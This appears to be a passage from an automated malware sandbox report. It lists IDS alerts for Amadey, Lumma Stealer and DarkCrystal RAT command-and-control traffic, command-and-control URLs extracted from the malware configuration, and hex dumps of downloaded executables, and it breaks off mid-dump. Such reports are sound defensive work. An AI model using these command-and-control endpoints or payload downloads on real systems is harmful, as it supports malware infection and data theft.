Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49825
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49827
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49823
Source: Network traffic	Suricata IDS: 2061135 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (oreheatq .live) : 192.168.2.5:53907 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49756
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49834 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49839 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49796
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49736
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49811
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49845 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49831
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49753
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49835
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49818
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49842
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49838
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49858 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49738
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49851
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49833
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49832
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49789
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49772
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49844
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49836
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49740
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49862 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49849 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2061136 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (oreheatq .live) in TLS SNI : 192.168.2.5:49869 -> 172.67.172.183:443
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49857
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49872
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49892
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49785
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49761
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49848
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49885
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49867
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49878
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49870
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49887
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49864
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49861
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49884
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49781
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49877
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49853
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49874
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49875
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49868
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49876 -> 5.252.155.176:80
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49859
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49882
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49890
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49880
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49888
Source: Network traffic	Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49895

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: galarona.bet/GKAns
Source: Malware configuration extractor	URLs: oreheatq.live/gsopp
Source: Malware configuration extractor	URLs: castmaxw.run/ganzde
Source: Malware configuration extractor	URLs: weldorae.digital/geds
Source: Malware configuration extractor	URLs: steelixr.live/aguiz
Source: Malware configuration extractor	URLs: advennture.top/GKsiio
Source: Malware configuration extractor	URLs: targett.top/dsANGt
Source: Malware configuration extractor	URLs: smeltingt.run/giiaus
Source: Malware configuration extractor	URLs: ferromny.digital/gwpd
Source: Malware configuration extractor	IPs: 185.215.113.16

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:55:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 15:06:50 GMTETag: "1dd000-631686b83b21b"Accept-Ranges: bytesContent-Length: 1953792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 90 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4d 00 00 04 00 00 c6 f9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 7b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 6e 69 78 62 6d 74 00 c0 1a 00 00 c0 32 00 00 bc 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 74 79 78 76 67 61 61 00 10 00 00 00 80 4d 00 00 04 00 00 00 aa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4d 00 00 22 00 00 00 ae 1d 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)/,(,/,),,(,-,-g,Y%,Y,Y.,Rich,PEL#gM@M@Wk
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Mar 2025 23:33:49 GMTETag: "51e6d-6314744ebb140"Accept-Ranges: bytesContent-Length: 335469Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 2e 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 06 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 cc 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cc 46 00 00 00 40 06 00 00 48 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 90 06 00 00 24 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b.00@@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 09:12:13 GMTETag: "58800-63163774f5cc4"Accept-Ranges: bytesContent-Length: 362496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 20 b1 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8b 0b 05 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 d0 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0c 05 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c d0 04 00 00 10 00 00 00 d2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 37 20 00 00 00 f0 04 00 00 22 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 d6 00 00 00 20 05 00 00 54 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 3a 00 00 00 00 06 00 00 3c 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTg @@@:.text\
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 10:35:28 GMTETag: "3e1134-63164a10a017f"Accept-Ranges: bytesContent-Length: 4067636Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 fe 03 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 f8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b00@P@p
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 11:56:49 GMTETag: "1d0e00-63165c3f5d75a"Accept-Ranges: bytesContent-Length: 1904128Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 54 01 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 00 06 00 00 00 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 20 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 68 6e 62 79 73 65 00 00 1a 00 00 b0 30 00 00 fa 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 62 67 63 7a 75 67 64 00 10 00 00 00 b0 4a 00 00 06 00 00 00 e6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 ec 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTgJ@JT@Wk
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 13:56:32 GMTETag: "b1028-63167701c47f2"Accept-Ranges: bytesContent-Length: 725032Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 09 00 28 7a e5 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 84 04 00 00 e6 00 00 00 00 00 00 b0 5c 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0b 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 28 05 00 28 00 00 00 00 00 00 00 